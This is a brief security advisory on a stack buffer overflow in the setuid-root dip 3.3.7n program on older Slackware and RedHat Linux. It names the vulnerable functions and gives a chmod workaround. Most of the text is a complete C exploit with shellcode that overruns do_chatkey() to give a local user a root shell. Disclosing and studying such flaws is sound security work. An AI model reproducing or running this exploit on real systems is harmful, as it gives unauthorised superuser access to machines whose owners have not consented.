PROGRAM: dip 3.3.7n, and probably other variants AFFECTED SYSTEMS: Linux - Slackware 3.0 and RedHat 2.1 verified, others unknown. IMPACT: Local users can get superuser privleges. SYNOPSIS: Some Linux distributions come with dip setuid root by default. There are multiple points in dip where an unbounded buffer is used with user supplied data making possible a stack overflow. Functions in which this appears to be possible include do_chatkey() and mdm_dial(). WORKAROUND: It is suggested that at least until the source has been further scrutinized that dip not be setuid unless necessary. chmod 0755 dip If you must have dip setuid, place it in a group where it can only be executed by trusted users. SAMPLE EXPLOIT: /* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/stat.h> #define PATH_DIP "/usr/sbin/dip" u_char shell[] = /* courtesy of avalon ;) */ "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; u_long esp() { __asm__("movl %esp, %eax"); } main() { u_char buf[1024]; u_long addr; int i, f; strcpy(buf, "chatkey "); addr = esp() - 192; for (i=8; i<128+16; i+=4) *((u_long *) (buf+i)) = addr; for (i=128+16; i<512; i++) buf[i] = 0x90; for (i=0; i<strlen(shell); i++) buf[512+i] = shell[i]; buf[512+i] = '\n'; if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) { perror("temp.dip"); exit(0); } write(f, buf, 512+i); close(f); execl(PATH_DIP, "dip", "temp.dip", (char *)0); } -------------------------------------------------------------------- Dan Walters djw@mail.utexas.edu